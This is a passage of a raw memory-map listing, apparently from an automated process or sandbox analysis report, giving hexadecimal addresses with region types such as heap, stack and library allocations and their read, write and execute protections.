|
page read and write
|
||
7FFAAC46E000
|
trusted library allocation
|
page read and write
|
||
7FFAACA36000
|
trusted library allocation
|
page read and write
|
||
7FFAAC838000
|
trusted library allocation
|
page read and write
|
||
7FFAAC793000
|
trusted library allocation
|
page read and write
|
||
1BC90570000
|
trusted library allocation
|
page read and write
|
||
7FFAAC628000
|
trusted library allocation
|
page read and write
|
||
7FFAAC122000
|
trusted library allocation
|
page read and write
|
||
16E9AB15000
|
heap
|
page read and write
|
||
7FFAAC90B000
|
trusted library allocation
|
page read and write
|
||
1BC8E650000
|
heap
|
page read and write
|
||
7FFAAC918000
|
trusted library allocation
|
page read and write
|
||
7FFAAC828000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3CD000
|
trusted library allocation
|
page read and write
|
||
E40000
|
heap
|
page read and write
|
||
23D076A9000
|
heap
|
page read and write
|
||
1DDEEFA0000
|
direct allocation
|
page execute and read and write
|
||
142DB154000
|
trusted library allocation
|
page read and write
|
||
1B042652000
|
heap
|
page read and write
|
||
7FFAAC582000
|
trusted library allocation
|
page read and write
|
||
7FF7FE541000
|
unkown
|
page execute read
|
||
7FFAAC724000
|
trusted library allocation
|
page read and write
|
||
1DDEED68000
|
heap
|
page read and write
|
||
7FFAAC83C000
|
trusted library allocation
|
page read and write
|
||
1B05CB60000
|
heap
|
page read and write
|
||
1BC907F3000
|
trusted library allocation
|
page read and write
|
||
1932CEE0000
|
heap
|
page read and write
|
||
1A4CC0D0000
|
heap
|
page read and write
|
||
7FFAAC7C6000
|
trusted library allocation
|
page read and write
|
||
23D076F6000
|
heap
|
page read and write
|
||
7FF7FE54B000
|
unkown
|
page readonly
|
||
7FFAAC123000
|
trusted library allocation
|
page execute and read and write
|
||
880000
|
heap
|
page read and write
|
||
23D06F31000
|
heap
|
page read and write
|
||
7FFAAC34A000
|
trusted library allocation
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
7FFAAC2C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC956000
|
trusted library allocation
|
page read and write
|
||
384C77E000
|
unkown
|
page readonly
|
||
7FF7FE54D000
|
unkown
|
page readonly
|
||
1BCAE440000
|
trusted library section
|
page read and write
|
||
23D06F29000
|
heap
|
page read and write
|
||
7FFAACA20000
|
trusted library allocation
|
page read and write
|
||
89D000
|
heap
|
page read and write
|
||
1A4B0B20000
|
trusted library allocation
|
page read and write
|
||
98C00FD000
|
stack
|
page read and write
|
||
7FFAAC79C000
|
trusted library allocation
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
7FFAAC549000
|
trusted library allocation
|
page read and write
|
||
7FFAAC85C000
|
trusted library allocation
|
page read and write
|
||
1A4B0C10000
|
heap
|
page read and write
|
||
1A4B097E000
|
heap
|
page read and write
|
||
23D076EE000
|
heap
|
page read and write
|
||
24E0000
|
heap
|
page execute and read and write
|
||
7FFAAC8D6000
|
trusted library allocation
|
page read and write
|
||
1BC8E8B5000
|
heap
|
page read and write
|
||
7FFAAC936000
|
trusted library allocation
|
page read and write
|
||
1F289E3D000
|
heap
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
23D06680000
|
heap
|
page read and write
|
||
7FFB23AA9000
|
unkown
|
page readonly
|
||
7FFAAC53F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC240000
|
trusted library allocation
|
page execute and read and write
|
||
2109A2F0000
|
heap
|
page read and write
|
||
7FFAAC13D000
|
trusted library allocation
|
page execute and read and write
|
||
15B2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC615000
|
trusted library allocation
|
page read and write
|
||
7FFAACB10000
|
trusted library allocation
|
page read and write
|
||
1F289E37000
|
heap
|
page read and write
|
||
7FFAAC3B3000
|
trusted library allocation
|
page read and write
|
||
B0C63F9000
|
stack
|
page read and write
|
||
1BC8E8B0000
|
heap
|
page read and write
|
||
4B8E000
|
stack
|
page read and write
|
||
7FFAACB64000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC34C000
|
trusted library allocation
|
page read and write
|
||
23D06684000
|
heap
|
page read and write
|
||
7FFAAC40A000
|
trusted library allocation
|
page read and write
|
||
7FFAACAB9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC83F000
|
trusted library allocation
|
page read and write
|
||
9C569FD000
|
stack
|
page read and write
|
||
142D5C6D000
|
heap
|
page read and write
|
||
23D06683000
|
heap
|
page read and write
|
||
7FFAACB27000
|
trusted library allocation
|
page read and write
|
||
4A53000
|
trusted library allocation
|
page read and write
|
||
7FFAAC497000
|
trusted library allocation
|
page read and write
|
||
2926222A000
|
heap
|
page read and write
|
||
23D065C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC9DF000
|
trusted library allocation
|
page read and write
|
||
2109A406000
|
heap
|
page read and write
|
||
2927C6A0000
|
heap
|
page execute and read and write
|
||
D80000
|
trusted library allocation
|
page read and write
|
||
23D06702000
|
heap
|
page read and write
|
||
7FFAACAB6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC82F000
|
trusted library allocation
|
page read and write
|
||
7FFAAC812000
|
trusted library allocation
|
page read and write
|
||
16E9AC40000
|
heap
|
page read and write
|
||
23D06626000
|
heap
|
page read and write
|
||
122C000
|
stack
|
page read and write
|
||
7FFAAC382000
|
trusted library allocation
|
page read and write
|
||
7FFAAC528000
|
trusted library allocation
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3B8000
|
trusted library allocation
|
page read and write
|
||
63D000
|
trusted library allocation
|
page execute and read and write
|
||
200A9939000
|
heap
|
page read and write
|
||
384CAFA000
|
stack
|
page read and write
|
||
1A4CDA42000
|
heap
|
page read and write
|
||
7FFAAC6AB000
|
trusted library allocation
|
page read and write
|
||
16E9ADD4000
|
trusted library allocation
|
page read and write
|
||
7FFAAC360000
|
trusted library allocation
|
page read and write
|
||
7FFAAC81D000
|
trusted library allocation
|
page read and write
|
||
E76000
|
heap
|
page read and write
|
||
142DB2C8000
|
heap
|
page read and write
|
||
7FFAAC722000
|
trusted library allocation
|
page read and write
|
||
7FFAACA19000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A5000
|
trusted library allocation
|
page read and write
|
||
384C9FE000
|
unkown
|
page readonly
|
||
384BDFE000
|
stack
|
page read and write
|
||
52CE000
|
stack
|
page read and write
|
||
A7C000
|
stack
|
page read and write
|
||
7FFAACA00000
|
trusted library allocation
|
page read and write
|
||
7FFAAC18C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC469000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC528000
|
trusted library allocation
|
page read and write
|
||
384B5FE000
|
unkown
|
page readonly
|
||
1F289F00000
|
trusted library allocation
|
page read and write
|
||
23D0763B000
|
heap
|
page read and write
|
||
7FFAAC3CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5EE000
|
trusted library allocation
|
page read and write
|
||
23D0669F000
|
heap
|
page read and write
|
||
1BCA01D3000
|
trusted library allocation
|
page read and write
|
||
23D066B2000
|
heap
|
page read and write
|
||
7FFAAC3EA000
|
trusted library allocation
|
page read and write
|
||
1A4C26E1000
|
trusted library allocation
|
page read and write
|
||
1B055639000
|
trusted library allocation
|
page read and write
|
||
16E98F60000
|
unkown
|
page readonly
|
||
7FFAAC3AA000
|
trusted library allocation
|
page read and write
|
||
98BFCF3000
|
stack
|
page read and write
|
||
22F1000
|
trusted library allocation
|
page read and write
|
||
562977E000
|
unkown
|
page read and write
|
||
7FFAAC852000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3EB000
|
trusted library allocation
|
page read and write
|
||
2109A348000
|
heap
|
page read and write
|
||
7FFAAC89D000
|
trusted library allocation
|
page read and write
|
||
7FFAACB4C000
|
trusted library allocation
|
page read and write
|
||
1DDEF020000
|
heap
|
page read and write
|
||
7FFAAC7C4000
|
trusted library allocation
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
1BCAB62F000
|
heap
|
page read and write
|
||
1A4CD9DC000
|
heap
|
page read and write
|
||
4970000
|
heap
|
page execute and read and write
|
||
A36A4FE000
|
stack
|
page read and write
|
||
7FFAAC53A000
|
trusted library allocation
|
page read and write
|
||
23D0660B000
|
heap
|
page read and write
|
||
23D07654000
|
heap
|
page read and write
|
||
7FFAAC1EC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC536000
|
trusted library allocation
|
page read and write
|
||
1A4C26D1000
|
trusted library allocation
|
page read and write
|
||
7FFAACA5D000
|
trusted library allocation
|
page read and write
|
||
B0C67FE000
|
unkown
|
page readonly
|
||
142DB200000
|
heap
|
page read and write
|
||
7FFAACB4D000
|
trusted library allocation
|
page read and write
|
||
1DDEF025000
|
heap
|
page read and write
|
||
7FFAAC692000
|
trusted library allocation
|
page read and write
|
||
142D5CA9000
|
heap
|
page read and write
|
||
7FFAAC51C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC746000
|
trusted library allocation
|
page read and write
|
||
9EB557E000
|
stack
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
6AAE000
|
stack
|
page read and write
|
||
7FFAAC5DE000
|
trusted library allocation
|
page read and write
|
||
26E36990000
|
heap
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
7FFAAC5DC000
|
trusted library allocation
|
page read and write
|
||
7FFB23AAD000
|
unkown
|
page readonly
|
||
12D5000
|
heap
|
page read and write
|
||
1B0427F0000
|
heap
|
page read and write
|
||
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
2B0F000
|
stack
|
page read and write
|
||
4B40000
|
heap
|
page execute and read and write
|
||
7FFAAC574000
|
trusted library allocation
|
page read and write
|
||
1A4B26B0000
|
heap
|
page execute and read and write
|
||
7FFAAC83C000
|
trusted library allocation
|
page read and write
|
||
1BCA9ED0000
|
heap
|
page read and write
|
||
7FFAAC979000
|
trusted library allocation
|
page read and write
|
||
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A3000
|
trusted library allocation
|
page read and write
|
||
1A4B0990000
|
heap
|
page read and write
|
||
29A59FE000
|
stack
|
page read and write
|
||
23D06682000
|
heap
|
page read and write
|
||
7FFAAC465000
|
trusted library allocation
|
page read and write
|
||
7FFAAC74A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC124000
|
trusted library allocation
|
page read and write
|
||
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
23D066FD000
|
heap
|
page read and write
|
||
1B0441B0000
|
heap
|
page read and write
|
||
7FFAAC85F000
|
trusted library allocation
|
page read and write
|
||
159D000
|
stack
|
page read and write
|
||
7FFAAC87B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC858000
|
trusted library allocation
|
page read and write
|
||
7FFAAC637000
|
trusted library allocation
|
page read and write
|
||
126E000
|
heap
|
page read and write
|
||
7FFAAC4F8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3EB000
|
trusted library allocation
|
page read and write
|
||
634000
|
trusted library allocation
|
page read and write
|
||
1A4B0A32000
|
heap
|
page read and write
|
||
C5ACFF000
|
stack
|
page read and write
|
||
7FFAAC8CB000
|
trusted library allocation
|
page read and write
|
||
1A4B0BE5000
|
heap
|
page read and write
|
||
7FFAAC833000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4B4000
|
trusted library allocation
|
page read and write
|
||
CFE000
|
stack
|
page read and write
|
||
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
7FFAECEB0000
|
direct allocation
|
page execute read
|
||
292641CE000
|
trusted library allocation
|
page read and write
|
||
23D06F94000
|
heap
|
page read and write
|
||
7FFAAC48E000
|
trusted library allocation
|
page read and write
|
||
1BCAB5A7000
|
heap
|
page read and write
|
||
1B04260C000
|
heap
|
page read and write
|
||
1B042815000
|
heap
|
page read and write
|
||
142DB2C0000
|
heap
|
page read and write
|
||
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
7FFAAC536000
|
trusted library allocation
|
page read and write
|
||
1B0541D1000
|
trusted library allocation
|
page read and write
|
||
1F28A010000
|
remote allocation
|
page execute and read and write
|
||
1A4B0BE0000
|
heap
|
page read and write
|
||
7FFAAC7F5000
|
trusted library allocation
|
page read and write
|
||
23D0671A000
|
heap
|
page read and write
|
||
7FFAAC7FC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3CD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC874000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A5000
|
trusted library allocation
|
page read and write
|
||
2926229E000
|
heap
|
page read and write
|
||
23D076A0000
|
heap
|
page read and write
|
||
5C8E000
|
stack
|
page read and write
|
||
29263DB1000
|
trusted library allocation
|
page read and write
|
||
7FFAACAB6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC355000
|
trusted library allocation
|
page read and write
|
||
23D06629000
|
heap
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
7FFAACB37000
|
trusted library allocation
|
page read and write
|
||
7FFAAC588000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3CF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC43A000
|
trusted library allocation
|
page read and write
|
||
5F6E000
|
stack
|
page read and write
|
||
A36A8FE000
|
stack
|
page read and write
|
||
98BFFFE000
|
stack
|
page read and write
|
||
2927D880000
|
heap
|
page read and write
|
||
7FFAAC469000
|
trusted library allocation
|
page read and write
|
||
7FFAAC74C000
|
trusted library allocation
|
page read and write
|
||
7FFAACA32000
|
trusted library allocation
|
page read and write
|
||
547E000
|
stack
|
page read and write
|
||
1BC9078B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC576000
|
trusted library allocation
|
page read and write
|
||
23D07712000
|
heap
|
page read and write
|
||
B0C65FE000
|
unkown
|
page readonly
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC729000
|
trusted library allocation
|
page read and write
|
||
1B042452000
|
unkown
|
page readonly
|
||
7FFAAC93D000
|
trusted library allocation
|
page read and write
|
||
7FFAACB29000
|
trusted library allocation
|
page read and write
|
||
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
23D06F59000
|
heap
|
page read and write
|
||
1932CEB9000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC7D6000
|
trusted library allocation
|
page read and write
|
||
129B000
|
heap
|
page read and write
|
||
1A4CD9D1000
|
heap
|
page read and write
|
||
7FFAACB42000
|
trusted library allocation
|
page read and write
|
||
1A4B0A2D000
|
heap
|
page read and write
|
||
B0C66FB000
|
stack
|
page read and write
|
||
7FFAAC373000
|
trusted library allocation
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
2109A406000
|
heap
|
page read and write
|
||
23D06F08000
|
heap
|
page read and write
|
||
7FFAAC2D2000
|
trusted library allocation
|
page read and write
|
||
200A98C0000
|
remote allocation
|
page execute and read and write
|
||
4049000
|
trusted library allocation
|
page read and write
|
||
7FFAAC206000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACA95000
|
trusted library allocation
|
page read and write
|
||
142DB400000
|
trusted library allocation
|
page read and write
|
||
29262201000
|
heap
|
page read and write
|
||
7FFAAC45C000
|
trusted library allocation
|
page read and write
|
||
23D076C6000
|
heap
|
page read and write
|
||
7FFAAC122000
|
trusted library allocation
|
page read and write
|
||
23D076C9000
|
heap
|
page read and write
|
||
7FFAAC9E8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC952000
|
trusted library allocation
|
page read and write
|
||
478E000
|
stack
|
page read and write
|
||
7FFAAC58C000
|
trusted library allocation
|
page read and write
|
||
7FFAACA42000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC206000
|
trusted library allocation
|
page execute and read and write
|
||
23D076A2000
|
heap
|
page read and write
|
||
42D68FC000
|
stack
|
page read and write
|
||
76B000
|
trusted library allocation
|
page execute and read and write
|
||
384D17E000
|
stack
|
page read and write
|
||
6EE0F000
|
unkown
|
page readonly
|
||
16EB33B0000
|
heap
|
page execute and read and write
|
||
7FFAAC78B000
|
trusted library allocation
|
page read and write
|
||
23D07726000
|
heap
|
page read and write
|
||
1F289E74000
|
heap
|
page read and write
|
||
43EE000
|
stack
|
page read and write
|
||
7FFAAC926000
|
trusted library allocation
|
page read and write
|
||
1A4B2C23000
|
trusted library allocation
|
page read and write
|
||
3AF1000
|
trusted library allocation
|
page read and write
|
||
7FFAACB44000
|
trusted library allocation
|
page read and write
|
||
1B044100000
|
heap
|
page execute and read and write
|
||
7FFAAC3CF000
|
trusted library allocation
|
page read and write
|
||
23D06F3B000
|
heap
|
page read and write
|
||
142DB450000
|
trusted library allocation
|
page read and write
|
||
23D07684000
|
heap
|
page read and write
|
||
7FFAAC300000
|
trusted library allocation
|
page read and write
|
||
7FFAAC909000
|
trusted library allocation
|
page read and write
|
||
7FFAAC12D000
|
trusted library allocation
|
page execute and read and write
|
||
1BCA01D1000
|
trusted library allocation
|
page read and write
|
||
98C06FA000
|
stack
|
page read and write
|
||
12A3000
|
heap
|
page read and write
|
||
23D07681000
|
heap
|
page read and write
|
||
142D6790000
|
trusted library allocation
|
page read and write
|
||
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
24F8000
|
trusted library allocation
|
page read and write
|
||
7FFAACAD2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC838000
|
trusted library allocation
|
page read and write
|
||
1B05CB40000
|
heap
|
page read and write
|
||
1F28A200000
|
heap
|
page read and write
|
||
7FFAAC572000
|
trusted library allocation
|
page read and write
|
||
16EAAE50000
|
trusted library allocation
|
page read and write
|
||
2109A3D9000
|
heap
|
page read and write
|
||
7FFAAC8F7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC63D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6AB000
|
trusted library allocation
|
page read and write
|
||
29263EA7000
|
trusted library allocation
|
page read and write
|
||
23D0770D000
|
heap
|
page read and write
|
||
3041000
|
trusted library allocation
|
page read and write
|
||
1932CE20000
|
heap
|
page read and write
|
||
23D06F54000
|
heap
|
page read and write
|
||
98BFEFE000
|
stack
|
page read and write
|
||
23D07680000
|
heap
|
page read and write
|
||
1B04266C000
|
heap
|
page read and write
|
||
384C8FD000
|
stack
|
page read and write
|
||
7FFAAC846000
|
trusted library allocation
|
page read and write
|
||
7FFAAC326000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7CA000
|
trusted library allocation
|
page read and write
|
||
7FFAACA8E000
|
trusted library allocation
|
page read and write
|
||
142DB110000
|
trusted library allocation
|
page read and write
|
||
7FFAAC726000
|
trusted library allocation
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
688000
|
heap
|
page read and write
|
||
23D07677000
|
heap
|
page read and write
|
||
29263C00000
|
heap
|
page read and write
|
||
7FFAAC2CB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC936000
|
trusted library allocation
|
page read and write
|
||
1A4B0802000
|
unkown
|
page readonly
|
||
7FFAAC84E000
|
trusted library allocation
|
page read and write
|
||
23D066C5000
|
heap
|
page read and write
|
||
7FFAAC81D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2C7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2E8000
|
trusted library allocation
|
page execute and read and write
|
||
15D0000
|
trusted library allocation
|
page read and write
|
||
7FFAACB39000
|
trusted library allocation
|
page read and write
|
||
7FFAAC51E000
|
trusted library allocation
|
page read and write
|
||
23D07480000
|
direct allocation
|
page execute and read and write
|
||
142D5C92000
|
heap
|
page read and write
|
||
7FFAAC8C3000
|
trusted library allocation
|
page read and write
|
||
2A0F000
|
trusted library allocation
|
page read and write
|
||
5530000
|
heap
|
page read and write
|
||
562967D000
|
stack
|
page read and write
|
||
A36A2F3000
|
stack
|
page read and write
|
||
7FFAAC822000
|
trusted library allocation
|
page read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
7FFAAC928000
|
trusted library allocation
|
page read and write
|
||
7FFAAC70E000
|
trusted library allocation
|
page read and write
|
||
200AB659000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC886000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
9C560FE000
|
stack
|
page read and write
|
||
2A35000
|
trusted library allocation
|
page read and write
|
||
23D07704000
|
heap
|
page read and write
|
||
7FFAAC842000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8C3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC82B000
|
trusted library allocation
|
page read and write
|
||
26E369C0000
|
heap
|
page read and write
|
||
23D076BC000
|
heap
|
page read and write
|
||
7FFAAC907000
|
trusted library allocation
|
page read and write
|
||
3030000
|
heap
|
page execute and read and write
|
||
7FFAAC4BA000
|
trusted library allocation
|
page read and write
|
||
15B7000
|
trusted library allocation
|
page execute and read and write
|
||
8A2000
|
heap
|
page read and write
|
||
488F000
|
stack
|
page read and write
|
||
142DB30A000
|
heap
|
page read and write
|
||
7FFAAC12D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC6F2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2CB000
|
trusted library allocation
|
page read and write
|
||
EC9000
|
heap
|
page read and write
|
||
7FFAAC8BA000
|
trusted library allocation
|
page read and write
|
||
142D5C00000
|
heap
|
page read and write
|
||
7FFAAC7DD000
|
trusted library allocation
|
page read and write
|
||
7FFAACA89000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2DE000
|
trusted library allocation
|
page read and write
|
||
1B05CA00000
|
heap
|
page execute and read and write
|
||
1A4C26ED000
|
trusted library allocation
|
page read and write
|
||
7FFAAC91D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC814000
|
trusted library allocation
|
page read and write
|
||
15A2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC78B000
|
trusted library allocation
|
page read and write
|
||
9C566FE000
|
stack
|
page read and write
|
||
7FFAACA8E000
|
trusted library allocation
|
page read and write
|
||
23D07677000
|
heap
|
page read and write
|
||
EA2000
|
heap
|
page read and write
|
||
7FFAAC576000
|
trusted library allocation
|
page read and write
|
||
6CAC000
|
stack
|
page read and write
|
||
2109A3D6000
|
heap
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC93D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC55D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC952000
|
trusted library allocation
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
23D06600000
|
heap
|
page read and write
|
||
7FFAAC37D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC673000
|
trusted library allocation
|
page read and write
|
||
67D000
|
heap
|
page read and write
|
||
2927F417000
|
heap
|
page read and write
|
||
1BC8E7EC000
|
heap
|
page read and write
|
||
23D066FE000
|
heap
|
page read and write
|
||
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
23D06F29000
|
heap
|
page read and write
|
||
7FF7FE547000
|
unkown
|
page readonly
|
||
7FFAAC83A000
|
trusted library allocation
|
page read and write
|
||
1F28A313000
|
heap
|
page read and write
|
||
142DB1E0000
|
trusted library allocation
|
page read and write
|
||
23D07744000
|
heap
|
page read and write
|
||
7FFAAC1D6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC744000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72F000
|
trusted library allocation
|
page read and write
|
||
23D066EE000
|
heap
|
page read and write
|
||
7FFAAC7B7000
|
trusted library allocation
|
page read and write
|
||
54BC000
|
stack
|
page read and write
|
||
7FFAAC92D000
|
trusted library allocation
|
page read and write
|
||
7FB60000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACA92000
|
trusted library allocation
|
page read and write
|
||
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC408000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7FC000
|
trusted library allocation
|
page read and write
|
||
1B05FEB0000
|
trusted library section
|
page read and write
|
||
23D06F52000
|
heap
|
page read and write
|
||
7FFAAC7B2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC918000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8BC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC90E000
|
trusted library allocation
|
page read and write
|
||
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
1BC900A0000
|
heap
|
page read and write
|
||
7FFAAC462000
|
trusted library allocation
|
page read and write
|
||
23D06F63000
|
heap
|
page read and write
|
||
7FFAAC732000
|
trusted library allocation
|
page read and write
|
||
142D70A0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
7FFAACA12000
|
trusted library allocation
|
page read and write
|
||
7FFAAC326000
|
trusted library allocation
|
page read and write
|
||
7FFAAC544000
|
trusted library allocation
|
page read and write
|
||
7FFAACAB4000
|
trusted library allocation
|
page read and write
|
||
6DAD000
|
stack
|
page read and write
|
||
23D06F96000
|
heap
|
page read and write
|
||
6C2E000
|
stack
|
page read and write
|
||
7FFAAC824000
|
trusted library allocation
|
page read and write
|
||
7FFAAC150000
|
trusted library allocation
|
page read and write
|
||
7FFB23AA6000
|
unkown
|
page readonly
|
||
16E9AC20000
|
heap
|
page read and write
|
||
2109A427000
|
heap
|
page read and write
|
||
7FFAAC397000
|
trusted library allocation
|
page read and write
|
||
16E99290000
|
trusted library allocation
|
page read and write
|
||
7FFAAC767000
|
trusted library allocation
|
page read and write
|
||
7FF7FE54B000
|
unkown
|
page readonly
|
||
7FFAAC316000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8A3000
|
trusted library allocation
|
page read and write
|
||
16E99246000
|
heap
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
1490000
|
heap
|
page read and write
|
||
7FFAAC373000
|
trusted library allocation
|
page read and write
|
||
7FFAAC53F000
|
trusted library allocation
|
page read and write
|
||
23D07700000
|
heap
|
page read and write
|
||
7FFAAC2C0000
|
trusted library allocation
|
page read and write
|
||
1A4C26C1000
|
trusted library allocation
|
page read and write
|
||
7FFAAC692000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7C6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4BA000
|
trusted library allocation
|
page read and write
|
||
1DDEED60000
|
heap
|
page read and write
|
||
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
384AB5B000
|
stack
|
page read and write
|
||
7FFAAC7D8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC819000
|
trusted library allocation
|
page read and write
|
||
23D06F40000
|
heap
|
page read and write
|
||
636E000
|
stack
|
page read and write
|
||
7FFAAC3C0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC752000
|
trusted library allocation
|
page read and write
|
||
1B0541D7000
|
trusted library allocation
|
page read and write
|
||
5CC8000
|
heap
|
page read and write
|
||
7FFAACB39000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6AD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC884000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3D2000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8AB000
|
trusted library allocation
|
page read and write
|
||
23D06F59000
|
heap
|
page read and write
|
||
23D076D5000
|
heap
|
page read and write
|
||
32F1000
|
trusted library allocation
|
page read and write
|
||
23D0674C000
|
heap
|
page read and write
|
||
16E9923E000
|
heap
|
page read and write
|
||
7FFAAC66B000
|
trusted library allocation
|
page read and write
|
||
646E000
|
stack
|
page read and write
|
||
7FFAACAB4000
|
trusted library allocation
|
page read and write
|
||
7FFAACB30000
|
trusted library allocation
|
page read and write
|
||
A36A7FC000
|
stack
|
page read and write
|
||
1470000
|
trusted library allocation
|
page read and write
|
||
7FFAACA92000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1E0000
|
trusted library allocation
|
page read and write
|
||
1BC90110000
|
heap
|
page execute and read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
23D06F10000
|
heap
|
page read and write
|
||
7FFAAC726000
|
trusted library allocation
|
page read and write
|
||
142DB2E8000
|
heap
|
page read and write
|
||
7FFAAC4AD000
|
trusted library allocation
|
page read and write
|
||
1A4C26C8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC8C9000
|
trusted library allocation
|
page read and write
|
||
2EF0000
|
trusted library allocation
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
7FFAAC879000
|
trusted library allocation
|
page read and write
|
||
28DE000
|
stack
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3AC000
|
trusted library allocation
|
page read and write
|
||
7FFAAC538000
|
trusted library allocation
|
page read and write
|
||
103F000
|
stack
|
page read and write
|
||
7FFAAC882000
|
trusted library allocation
|
page read and write
|
||
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
16E9AF46000
|
trusted library allocation
|
page read and write
|
||
23D06F79000
|
heap
|
page read and write
|
||
5629DFE000
|
stack
|
page read and write
|
||
7D5000
|
heap
|
page read and write
|
||
7FFAAC874000
|
trusted library allocation
|
page read and write
|
||
B8A000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC36A000
|
trusted library allocation
|
page read and write
|
||
6EDF1000
|
unkown
|
page execute read
|
||
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
29263DA0000
|
heap
|
page read and write
|
||
9B6000
|
trusted library allocation
|
page read and write
|
||
7FFAAC81B000
|
trusted library allocation
|
page read and write
|
||
1B042720000
|
heap
|
page read and write
|
||
7FFAAC13D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACB00000
|
